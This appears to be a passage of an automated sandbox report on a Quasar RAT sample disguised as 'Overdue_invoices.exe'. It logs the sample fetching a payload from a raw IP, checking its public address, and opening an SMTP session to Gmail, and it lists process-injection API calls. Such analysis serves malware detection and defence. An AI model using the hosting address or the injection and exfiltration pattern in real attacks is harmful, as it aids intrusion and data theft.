Jan 27, 2021 15:15:15.708930969 CET | 443 | 49735 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:15.973541021 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.022650003 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.022759914 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.080607891 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.080883026 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.130538940 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.134344101 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.134633064 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.186044931 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.186659098 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.237952948 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.237977028 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.238143921 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.246917009 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.299015045 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.344227076 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.354690075 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.405006886 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.417948961 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.467508078 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.468110085 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.521284103 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.892911911 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.896394968 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:16.944624901 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.944956064 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:16.973335981 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109
Jan 27, 2021 15:15:17.021986008 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3
Jan 27, 2021 15:15:17.022253036 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109

                                                    UDP Packets


                                                    DNS Queries

                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    Jan 27, 2021 15:15:12.852633953 CET | 192.168.2.3 | 8.8.8.8 | 0x90af | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.931613922 CET | 192.168.2.3 | 8.8.8.8 | 0xed11 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:13.925585985 CET | 192.168.2.3 | 8.8.8.8 | 0xbd5c | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:15.898952007 CET | 192.168.2.3 | 8.8.8.8 | 0xcc74 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)

                                                    DNS Answers

                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Jan 27, 2021 15:15:12.915644884 CET | 8.8.8.8 | 192.168.2.3 | 0x90af | No error (0) | raw.githubusercontent.com | github.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET | 8.8.8.8 | 192.168.2.3 | 0x90af | No error (0) | github.map.fastly.net | - | 151.101.0.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET | 8.8.8.8 | 192.168.2.3 | 0x90af | No error (0) | github.map.fastly.net | - | 151.101.64.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET | 8.8.8.8 | 192.168.2.3 | 0x90af | No error (0) | github.map.fastly.net | - | 151.101.128.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET | 8.8.8.8 | 192.168.2.3 | 0x90af | No error (0) | github.map.fastly.net | - | 151.101.192.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET | 8.8.8.8 | 192.168.2.3 | 0xed11 | No error (0) | raw.githubusercontent.com | github.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET | 8.8.8.8 | 192.168.2.3 | 0xed11 | No error (0) | github.map.fastly.net | - | 151.101.0.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET | 8.8.8.8 | 192.168.2.3 | 0xed11 | No error (0) | github.map.fastly.net | - | 151.101.64.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET | 8.8.8.8 | 192.168.2.3 | 0xed11 | No error (0) | github.map.fastly.net | - | 151.101.128.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET | 8.8.8.8 | 192.168.2.3 | 0xed11 | No error (0) | github.map.fastly.net | - | 151.101.192.133 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:13.984045029 CET | 8.8.8.8 | 192.168.2.3 | 0xbd5c | No error (0) | icanhazip.com | - | 147.75.47.199 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:13.984045029 CET | 8.8.8.8 | 192.168.2.3 | 0xbd5c | No error (0) | icanhazip.com | - | 136.144.56.255 | A (IP address) | IN (0x0001)
                                                    Jan 27, 2021 15:15:15.972109079 CET | 8.8.8.8 | 192.168.2.3 | 0xcc74 | No error (0) | smtp.gmail.com | - | 108.177.119.109 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 193.239.147.103
                                                    • icanhazip.com

                                                    HTTP Packets

                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.3 | 49721 | 193.239.147.103 | 80 | C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 27, 2021 15:15:04.125174999 CET | 72 | OUT | GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1
                                                    Host: 193.239.147.103
                                                    Connection: Keep-Alive
                                                    Jan 27, 2021 15:15:04.173216105 CET | 73 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Wed, 27 Jan 2021 14:15:04 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 439235
                                                    Last-Modified: Tue, 26 Jan 2021 23:18:44 GMT
                                                    Connection: keep-alive
                                                    Vary: Accept-Encoding
                                                    ETag: "6010a354-6b3c3"
                                                    X-Frame-Options: SAMEORIGIN
                                                    Accept-Ranges: bytes


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.2.3 | 49734 | 147.75.47.199 | 80 | C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 27, 2021 15:15:14.142913103 CET | 634 | OUT | GET / HTTP/1.1
                                                    Host: icanhazip.com
                                                    Connection: Keep-Alive
                                                    Jan 27, 2021 15:15:14.300822020 CET | 635 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 27 Jan 2021 14:15:14 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 12
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    x-rtfm: Learn about this site at http://bit.ly/icanhazip-faq and do not abuse the service.
                                                    x-node: icanhazip-dfw-1
                                                    x-donation: This site is expensive to run. You can donate BTC to 3LSp89k9qnMJBpV7AUNF3M2Eo1vatpkYpm
                                                    x-duck:
                                                    Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 0a
                                                    Data Ascii: 84.17.52.74


                                                    SMTP Packets

                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                    Jan 27, 2021 15:15:16.080607891 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3 | 220 smtp.gmail.com ESMTP y9sm1454236edi.74 - gsmtp
                                                    Jan 27, 2021 15:15:16.080883026 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109 | EHLO 494126
                                                    Jan 27, 2021 15:15:16.134344101 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.74]
                                                    250-SIZE 35882577
                                                    250-8BITMIME
                                                    250-STARTTLS
                                                    250-ENHANCEDSTATUSCODES
                                                    250-PIPELINING
                                                    250-CHUNKING
                                                    250 SMTPUTF8
                                                    Jan 27, 2021 15:15:16.134633064 CET | 49736 | 587 | 192.168.2.3 | 108.177.119.109 | STARTTLS
                                                    Jan 27, 2021 15:15:16.186044931 CET | 587 | 49736 | 108.177.119.109 | 192.168.2.3 | 220 2.0.0 Ready to start TLS

                                                    System Behavior

                                                    General

                                                    Start time:15:15:02
                                                    Start date:27/01/2021
                                                    Path:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\Overdue_invoices.exe'
                                                    Imagebase:0x400000
                                                    File size:100864 bytes
                                                    MD5 hash:AFA35EE8F27C8A6661219BCCB198FD9B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Author: Florian Roth
                                                    Reputation:low

                                                    General

                                                    Start time:15:15:10
                                                    Start date:27/01/2021
                                                    Path:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Imagebase:0xdb0000
                                                    File size:100864 bytes
                                                    MD5 hash:AFA35EE8F27C8A6661219BCCB198FD9B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                    Reputation:low

                                                    Disassembly

                                                    Code Analysis

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 172fea99f5c797f60c08bea6a0c262c6739ccf9235562e1e76d78851fa3d85d5
                                                      • Instruction ID: 23e0f62178a2029460c117bf201001964b8bdca6e8de9a8c3a58f604c7f5d19e
                                                      • Opcode Fuzzy Hash: 172fea99f5c797f60c08bea6a0c262c6739ccf9235562e1e76d78851fa3d85d5
                                                      • Instruction Fuzzy Hash: 39026C70B002198FDB18DFA5C854BAEBBB6AF88344F25856AE506DB391DF34DD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6466a27cdb90436fc5b1a432cfa62dcb291c7c83569c3a3a393f92526aa95cd1
                                                      • Instruction ID: a71ff731a96e062953ca4aeb937da70a9a8463922abbec558833c6b51111a100
                                                      • Opcode Fuzzy Hash: 6466a27cdb90436fc5b1a432cfa62dcb291c7c83569c3a3a393f92526aa95cd1
                                                      • Instruction Fuzzy Hash: 6CE15A74A04119CFCB19CFA9D984AADBBB2FF88344F55846AE406AB361F730DD41CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbb0717fdf68e538827e780f0eb72435268d4534bfd9d9f466d07fbb1b648a4c
                                                      • Instruction ID: e5c408e4e88f3aecf3435f69bf3dfea09442a22727a2ab52734836e6d6d17910
                                                      • Opcode Fuzzy Hash: dbb0717fdf68e538827e780f0eb72435268d4534bfd9d9f466d07fbb1b648a4c
                                                      • Instruction Fuzzy Hash: 2451632180E3D05FDB03BB78A8707D63F719F53229F0A48E7D5818F6A3D6289819D766
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00ADD0D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 1ab8c869058a2f1f230037f1aa40bd1efd377632734bac8fa4f5baabb66433fe
                                                      • Instruction ID: 7117f1860fe0c6ee221f995b09152a0258287a4293bb95ba837310a73518cc56
                                                      • Opcode Fuzzy Hash: 1ab8c869058a2f1f230037f1aa40bd1efd377632734bac8fa4f5baabb66433fe
                                                      • Instruction Fuzzy Hash: C5915A71D00219DFDF10DFA5C8817EEBBB2BB48314F15856AE81AA7380DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00ADD0D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: c18698828029c135bf093d7b24c950cdedfe2bc78ff9736bfc0c2a9594ec8ce6
                                                      • Instruction ID: 19408ff17ff96904b212fdbc69ae0ed99b34bebff2ae05c710e0f5b0890cbef4
                                                      • Opcode Fuzzy Hash: c18698828029c135bf093d7b24c950cdedfe2bc78ff9736bfc0c2a9594ec8ce6
                                                      • Instruction Fuzzy Hash: 73914971D00219DFDF10DFA4C8817EEBBB2BB48314F1585AAE81AA7380DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00ADC2A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9ab3a96724198716abc69a203d72bec6ebebf0575c35d175c2ccc6ec1b8ef0d9
                                                      • Instruction ID: 69ccb71937e51443c5c48f54a5624af3736fcb89342ee19b0a6e8e33d6a5e295
                                                      • Opcode Fuzzy Hash: 9ab3a96724198716abc69a203d72bec6ebebf0575c35d175c2ccc6ec1b8ef0d9
                                                      • Instruction Fuzzy Hash: 2A2113719002599FCF10DFAAC884BDEBBF5FF48324F50842AE919A7340D778A954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 00ADB6F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 5647f04c1098f7792189cec19dea49deafc64d41d26031185e4ac73393c7ccbd
                                                      • Instruction ID: ef6ff3282db23194ae118e1bc6d6d28be1c3a799f99d07ecbac70bad8db35265
                                                      • Opcode Fuzzy Hash: 5647f04c1098f7792189cec19dea49deafc64d41d26031185e4ac73393c7ccbd
                                                      • Instruction Fuzzy Hash: 9C2115719002098FCB10DFAAC4847EEBBF4AF88364F55842AE519A7341DB78A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 00ADB6F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 2962f3d9031889d2c38109a825909edb359e5631c4060f6b5ef124860b416a77
                                                      • Instruction ID: 8bda40a3b29c91179348f027f7e543377357043d1bd0a6a7c9496e01e1fd553c
                                                      • Opcode Fuzzy Hash: 2962f3d9031889d2c38109a825909edb359e5631c4060f6b5ef124860b416a77
                                                      • Instruction Fuzzy Hash: 742138719003098FCB10DFAAC4847EEBBF4AF48364F55842ED519A7341DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00ADC988
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 01dfe9d10225ae910b618bc5cd766e445e9873141125387998ebe60553c96587
                                                      • Instruction ID: 3ef52e3f8dc3d513700482715a8d26a9c18b4fe5e4aaa02d8e8dd470403491e2
                                                      • Opcode Fuzzy Hash: 01dfe9d10225ae910b618bc5cd766e445e9873141125387998ebe60553c96587
                                                      • Instruction Fuzzy Hash: AB2128719003499FCF10DFAAC880ADEBBF5FF48324F50842AE519A7240D7799954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00ADC988
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 1783416f76e73a18b8e7aa9e023327bede45c9b262a6d6b8d0294deee681ecfc
                                                      • Instruction ID: a81302565a5001f970341a5531a44e8097141da13d0d3bc02982066c263cfc9a
                                                      • Opcode Fuzzy Hash: 1783416f76e73a18b8e7aa9e023327bede45c9b262a6d6b8d0294deee681ecfc
                                                      • Instruction Fuzzy Hash: 942128B19003498FCF10DFA9C8806EEBBF5FF48324F55882EE519A7240C7799955DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00ADBFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: b76d749e1eb090f8609365f5e43e34ea039fb4398530885682ca4f8d34b1da60
                                                      • Instruction ID: d6a009567c7ececc5aabc443096a27561e8fb63bc3a807f08ad2bfed35cc2466
                                                      • Opcode Fuzzy Hash: b76d749e1eb090f8609365f5e43e34ea039fb4398530885682ca4f8d34b1da60
                                                      • Instruction Fuzzy Hash: B21137719002499FCF10DFAAC844BDFBBF5AF48324F15881AE519A7250CB75A954CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00ADBFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: e913d250501231dfea6441c205157bf3d02b851c9f4838fe4cf0b5ae7f0c5ddf
                                                      • Instruction ID: 36b9f8663d4d808e189eb4e2d95a8a7939fde9b2067890a616eea1d219929c12
                                                      • Opcode Fuzzy Hash: e913d250501231dfea6441c205157bf3d02b851c9f4838fe4cf0b5ae7f0c5ddf
                                                      • Instruction Fuzzy Hash: B81197728002488FCF10DFA9C8447EEBBF5AF48324F24881AE519A7650C775A950CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: e1406e125f17c9c0e527b4c2a1df0b7ebcf406817fcfda774458d571e7eb1833
                                                      • Instruction ID: 7db1bef9c318716939a5e811cd04d2ff672f3c99cd66868c59b8dc346e725473
                                                      • Opcode Fuzzy Hash: e1406e125f17c9c0e527b4c2a1df0b7ebcf406817fcfda774458d571e7eb1833
                                                      • Instruction Fuzzy Hash: D3116D71D003098FCB10DFAAD4447EEBBF5AB88324F24891ED519A7350CB75A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 82a6cca0aaeda8a8f9be186d7e340dc660c26a162bb44be1dba664b84d20a116
                                                      • Instruction ID: 7e314e636fef0c706fa6682d5abad4a06d7dc3f9da81d3915de0259d07bbb21d
                                                      • Opcode Fuzzy Hash: 82a6cca0aaeda8a8f9be186d7e340dc660c26a162bb44be1dba664b84d20a116
                                                      • Instruction Fuzzy Hash: 65113A719002498BCB10DFAAD8447DEFBF4AB88328F24881AD519A7340DB75A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230033785.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 012218a497af080e05c6b4664390e10f6450ee8780fac885f3d178905ab1ff7f
                                                      • Instruction ID: d2a957a99906c42ddf635966105fed7b5cdae26f911ad2819c43f079f8168538
                                                      • Opcode Fuzzy Hash: 012218a497af080e05c6b4664390e10f6450ee8780fac885f3d178905ab1ff7f
                                                      • Instruction Fuzzy Hash: 16213A71504208DFDF04EF14D9C0B36BB6BFB94324F24C569EA094B296C33AE856D7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230033785.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                      • Instruction ID: 502e0d83c1173d62267b6a601ddd1740400f7a74006b0d80f1875795a7a2babb
                                                      • Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                      • Instruction Fuzzy Hash: 7111E676404284DFCF01DF14D5C4B26BF72FB94324F24C6A9D9080B666C33AE85ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4264f4044861948ad2b10aa3c3ad00dd05f5c326459f97c0d35681bc65c1ffe
                                                      • Instruction ID: 6528fd890be569142bbc3f79bcde56a284a7cc173f3f54f073fb4c4e43d17b30
                                                      • Opcode Fuzzy Hash: d4264f4044861948ad2b10aa3c3ad00dd05f5c326459f97c0d35681bc65c1ffe
                                                      • Instruction Fuzzy Hash: D0F17EB0A0120ACFDB14DFA5C884B9DBBF2FF48308F549569E509AB695DB71E845CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,07EF4EB9,00000800), ref: 07EF4F4A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 455eb67d3ac4e11f0c3b363a61a819fcfd4412f5b3f3c6eedccebc8797bb91e7
                                                      • Instruction ID: 85250853892edf1f668f6481f402f1bcf52d6ec7fdec209d0d8d5e75d0ec13c9
                                                      • Opcode Fuzzy Hash: 455eb67d3ac4e11f0c3b363a61a819fcfd4412f5b3f3c6eedccebc8797bb91e7
                                                      • Instruction Fuzzy Hash: B31156B6D002499FCB10DFAAD884BDEFBF4EB89324F10842AE519A7740C375A544CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,07EF4EB9,00000800), ref: 07EF4F4A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 43f4d2ebf252a91eb4faa600b3afdd1ed2030b7df713a9781db4120f87189986
                                                      • Instruction ID: 4e23fdb889316c747c3322211c0bfbdc5b30e278f3d2e38bcfdde37cb7212076
                                                      • Opcode Fuzzy Hash: 43f4d2ebf252a91eb4faa600b3afdd1ed2030b7df713a9781db4120f87189986
                                                      • Instruction Fuzzy Hash: 391130B69002498FCB10DFAAD844BDEFBF4AB89324F11842AE519A7640C375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 07EF8875
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 643edb0c1419d42e96f04b4a97f7995b67ffe82034d09799907b11edec3bf588
                                                      • Instruction ID: a3b5bf2f2478b48f8a4553e6874014ff04df4b74f01f6c7649101fb2670c1fca
                                                      • Opcode Fuzzy Hash: 643edb0c1419d42e96f04b4a97f7995b67ffe82034d09799907b11edec3bf588
                                                      • Instruction Fuzzy Hash: E41145B0D002488FCB10DF9AC448BDEBBF4EB48324F248429E519B7700C374A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 07EF8875
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.631004529.0000000007EF0000.00000040.00000001.sdmp, Offset: 07EF0000, based on PE: false
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 081147b1bcb6df6918b2ab904b0df6db3435cea6115e2886dd516f65f361369c
                                                      • Instruction ID: c7a653de0b0648021b1c43c74bcada21df57aebd9358474e4e1af476a79d4e0d
                                                      • Opcode Fuzzy Hash: 081147b1bcb6df6918b2ab904b0df6db3435cea6115e2886dd516f65f361369c
                                                      • Instruction Fuzzy Hash: 601133B59002888FCB10DFAAD445BDEBBF4EB48324F24841AE558A7700C374A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions